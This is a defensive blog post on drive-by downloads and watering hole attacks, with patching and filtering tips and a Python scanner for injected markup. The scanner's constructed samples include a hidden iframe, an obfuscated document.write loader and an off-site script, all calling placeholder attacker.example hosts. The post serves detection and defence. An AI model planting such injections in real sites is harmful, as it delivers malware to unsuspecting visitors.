Defending against drive-by downloads

In case you haven’t heard the term before, a drive-by download (DbD) is a class of cyber attack where you visit a booby-trapped web site and it automatically, and silently, downloads and executes malicious code on your computer.

By default, a web site can’t simply download and run code on your computer, so a successful DbD attack relies on a programming flaw or vulnerability in the software you use to surf the web. The browser itself, whether Internet Explorer, Firefox, Safari, or Chrome, is the most obvious target.

However, most users also install many other web-related products that attackers can exploit in DbD attacks. Java, Flash, Shockwave, Reader, QuickTime, and many others install plugins into your web browser so they can render the dynamic content you encounter on modern web sites. The problem is that a plugin also exposes that software to every page you visit, so a flaw in any one of them is reachable from the browser, and each plugin adds to the attack surface.

In short, if an attacker can find a vulnerability anywhere in the diverse set of software you use to browse the web, and can entice you to a web site hosting a bit of malicious code, he can exploit that flaw to make your computer infect itself with malware without your knowledge. By luring you somewhere and distracting you, these criminals quietly compromise you behind your back.

How do hackers get me to malicious sites?
“But wait a second,” you might exclaim, “I’m not naive enough to visit suspicious web sites on the Internet. They can’t infect me if they can’t get me there, right?”

Of course, you are correct. Unless an attacker can get you to his booby-trapped web site, his DbD attack will not succeed. However, you might be surprised at how easy it is to lure victims to booby-trapped sites today.

Let’s start with the old, tried-and-true techniques. In the past, you might have heard security professionals warn you against visiting the seedier side of the Internet. Just like the red-light districts of the real world, some of the sleazier parts of the Internet host a lot of questionably legal activity. Sites catering to pornography, software piracy, drug sales, and more often partner with cyber criminals (knowingly or unknowingly) and serve malware to their visitors via DbD attacks. Any time you see something shady offered for free on the Internet, chances are you’ll pay in ways you don’t quite know.

Another way to get victims to malicious sites is simply to invite them. Cyber criminals use every Internet messaging mechanism they can to spam out links to their malicious pages. They send emails, instant messages (IMs), or post to social networks, sharing links that go directly to booby-trapped web sites. Of course, they dress up the message to get you interested, citing the latest pop culture event or pretending to be a friend sharing a fun link. They also often use link-shortening services to make their malicious links look more benign. Since many users still don’t realize web links can be dangerous, many take the bait and click the link for an unwelcome surprise.

However, the most nefarious way to draw victims to booby-trapped DbD web sites is the watering hole attack. All the methods described previously depend on getting someone to a site they may not visit of their own accord, but what if you could hijack a site they already frequent? Just like lions stalking prey on the savanna, hackers know that if they can poison your favorite “watering hole” web site, you’ll surely stumble upon their DbD code.

The attackers search for web application vulnerabilities in popular, legitimate web sites, such as SQL injection (SQLi) and cross-site scripting (XSS) flaws, then exploit those problems to inject malicious code into the legitimate site. The injected code is usually small and easy to miss, typically a hidden iframe or a script tag that silently loads content from a server the attacker controls, and it redirects anyone who visits the site to the malicious DbD code hosted there.

In the past, I could warn you against visiting sordid web sites to avoid DbD attacks. However, today any site on the Internet—even the ones you trust the most—may have been hijacked and could be hiding a drive-by download.

Part of being a good spy is understanding your adversary’s techniques, and then learning the tradecraft that can protect you in the field. Now that you know what a drive-by download is and how it works, here are a few cyber tradecraft tips that will protect you online:

Patch, patch, and then patch some more – In “computer-ese,” patching means applying the latest updates to your software. As mentioned, web sites can’t forcefully download software to your computer unless they can take advantage of programming flaws in the software you run. Many of the DbD attacks seen in the wild exploit flaws that vendors have already fixed, so if you keep your software up to date, most of these attacks will fail. Obviously patch your web browser, but also know that hackers have been focusing on Java and Flash vulnerabilities lately. Patch these packages just as aggressively as the browser itself, and turn on automatic updates wherever the vendor offers them. In fact, I would recommend disabling the Java browser plugin if you can do without it.

Don’t click unsolicited links – Simply put, avoid clicking unsolicited links sent to you via email and IM. I probably can’t convince you not to click links from your friends (or ones that seem to come from your friends), but at least remain wary of them, and look at the URL for the link before clicking it. In an HTML email the visible text of a link and its real destination can be completely different, so hover over the link and read the address your mail client shows rather than the text you see. I would also be careful around shortened links, and use tools to expand and preview them before following them. Here’s a quick tip: if you add a “+” character to the end of a bit.ly link, you will see a preview of the actual URL before visiting it.
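To make the two checks above concrete, here is a small Python script that inspects HTML for the markup a watering hole attacker typically injects into a hijacked page (hidden iframes, scripts pulled from another domain, obfuscated `document.write`/`eval` wrappers) and for links in a message whose visible text disagrees with their real destination or that hide behind a shortener. This is an example added to this post, not a WatchGuard tool or anything from the original article. The sample page and e-mail are constructed, the hosts under `attacker.example` are placeholders, and the shortener list and “hidden” heuristics are assumptions you would tune for your own environment:

```python
"""Heuristic scanner for injected drive-by markup and deceptive links.

Example code added to this post (not a WatchGuard product). The samples
below are constructed; the attacker hostnames are placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: a short list of popular URL shorteners; extend for your users.
SHORTENERS = {"bit.ly", "j.mp", "bitly.com", "t.co", "goo.gl", "tinyurl.com", "ow.ly", "is.gd"}
# bit.ly-family services show a preview page when "+" is appended to the link.
PREVIEWABLE = {"bit.ly", "j.mp", "bitly.com"}
# Styles attackers use to keep an injected frame out of sight (assumed heuristics).
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|left\s*:\s*-\d{3,}px", re.I)
# Classic loader wrappers: document.write(unescape(...)), eval(String.fromCharCode(...)).
OBFUSCATED = re.compile(r"(document\.write|eval)\s*\(\s*(unescape|String\.fromCharCode)", re.I)
# Anchor text that itself looks like a URL or bare domain.
LOOKS_LIKE_URL = re.compile(r"^(https?://)?([a-z0-9-]+\.)+[a-z]{2,}(/\S*)?$", re.I)


def host_of(url):
    """Lowercase host of url, or '' for relative or malformed links."""
    return (urlparse(url).hostname or "").lower()


class _Collector(HTMLParser):
    """Collect iframes, scripts (with inline body) and anchors (with visible text)."""

    def __init__(self):
        super().__init__()
        self.iframes, self.scripts, self.anchors = [], [], []
        self._open = None  # (tag, attrs, text chunks) of the script/anchor being read

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append(attrs)
        elif tag in ("script", "a"):
            self._open = (tag, attrs, [])

    def handle_data(self, data):
        if self._open:
            self._open[2].append(data)

    def handle_endtag(self, tag):
        if self._open and self._open[0] == tag:
            kind, attrs, chunks = self._open
            target = self.scripts if kind == "script" else self.anchors
            target.append((attrs, "".join(chunks).strip()))
            self._open = None


def scan_html(html, site_host):
    """Return a list of (rule, detail) findings for one page or message body.

    site_host is the domain the content legitimately belongs to; frames and
    scripts that point anywhere else are reported.
    """
    p = _Collector()
    p.feed(html)
    findings = []
    for a in p.iframes:
        src = a.get("src", "")
        tiny = a.get("width", "").strip() in ("0", "1") or a.get("height", "").strip() in ("0", "1")
        if tiny or HIDDEN_STYLE.search(a.get("style", "")):
            findings.append(("hidden_iframe", src))
        elif host_of(src) not in ("", site_host):
            findings.append(("offsite_iframe", src))
    for attrs, body in p.scripts:
        src = attrs.get("src", "")
        if src and host_of(src) not in ("", site_host):
            findings.append(("offsite_script", src))
        if OBFUSCATED.search(body):
            findings.append(("obfuscated_script", body[:60]))
    for attrs, text in p.anchors:
        href = attrs.get("href", "")
        h = host_of(href)
        if h in SHORTENERS:
            findings.append(("short_link", href + "+" if h in PREVIEWABLE else href))
        if LOOKS_LIKE_URL.match(text):
            shown = host_of(text if "://" in text else "http://" + text)
            if shown != h:
                findings.append(("deceptive_link", f"{text} -> {href}"))
    return findings


# Constructed samples (not real captures): a hijacked page and a lure e-mail.
HIJACKED_PAGE = """<html><body><h1>Welcome to example.com</h1>
<script src="https://example.com/js/app.js"></script>
<script src="http://cdn.attacker.example/jquery.js"></script>
<script>document.write(unescape('%3Ciframe%20src%3D%22//x.attacker.example%22%3E'));</script>
<iframe src="http://exploit.attacker.example/in.php" width="1" height="1"></iframe>
<iframe src="https://example.com/widget" width="300" height="200"></iframe>
</body></html>"""

LURE_MAIL = """<p>Check out this video!</p>
<a href="http://bit.ly/xyz">funny video</a>
<a href="http://login.attacker.example/">https://www.example.com/account</a>"""

if __name__ == "__main__":
    for label, doc in (("hijacked page", HIJACKED_PAGE), ("lure e-mail", LURE_MAIL)):
        for rule, detail in scan_html(doc, "example.com"):
            print(f"{label}: {rule}: {detail}")
```

Run it against a saved copy of your own site’s pages after any deployment or suspected compromise, and against the raw HTML of a suspicious message. Note that it only inspects static markup: an injected script that assembles the iframe at run time will only show up here as the obfuscated wrapper, and a cleverer loader may not match at all, which is exactly why script blocking and reputation filtering still matter alongside this kind of check.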

Use antivirus (AV) and intrusion prevention (IPS) – While vigilance and good practices can help you avoid many attacks, no one is perfect. There will be a day when even the best of us stumbles onto a DbD attack site. IPS systems can frequently detect the network exploits these attacks leverage, and AV systems can often recognize the malicious payloads they try to silently download. Keep in mind that DbD operators repack their payloads frequently to stay ahead of signatures, so treat AV and IPS as a backstop to patching rather than a substitute for it. Use AV and IPS systems, and keep them up to date.

Use reputation-based web-filtering solutions – The malicious sites that serve DbD attacks change quite frequently, as do the legitimate sites that have been hijacked. Security organizations and vendors, like WatchGuard, use many automated techniques to keep track of the latest malware distributing sites, and offer reputation services that can keep you and your users away from them. You should consider using web-filtering solutions to help you avoid dangerous sites on the Internet.

Pro-tip: Limit web-based scripting with NoScript (and others) – Without going into all the technical details, know that many DbD attacks rely on active web content, such as JavaScript, ActiveX controls, and plugin content like Flash and Java, to carry out their attacks. Disabling these technologies outright would block the vast majority of DbD attacks. Unfortunately, it’s not quite that simple: many legitimate web sites use the same technologies for perfectly normal parts of their site. That’s why I recommend script whitelisting tools like Firefox’s NoScript or Chrome’s NotScripts, and the Click-to-Play setting for plugins. These add-ons prevent scripts and plugin content from running by default, while letting you easily whitelist the sites you trust.

Black hats have become extremely sneaky and sophisticated in their cyber attacks. Drive-by downloads have become the silent, de facto method criminals use to deliver most of their malware, and watering hole attacks make finding victims child’s play. However, with a little vigilance and knowledge, anyone can avoid this web-based infection vector. Diligently apply the cyber tradecraft you learned here and you’ll survive most DbD malware encounters unscathed.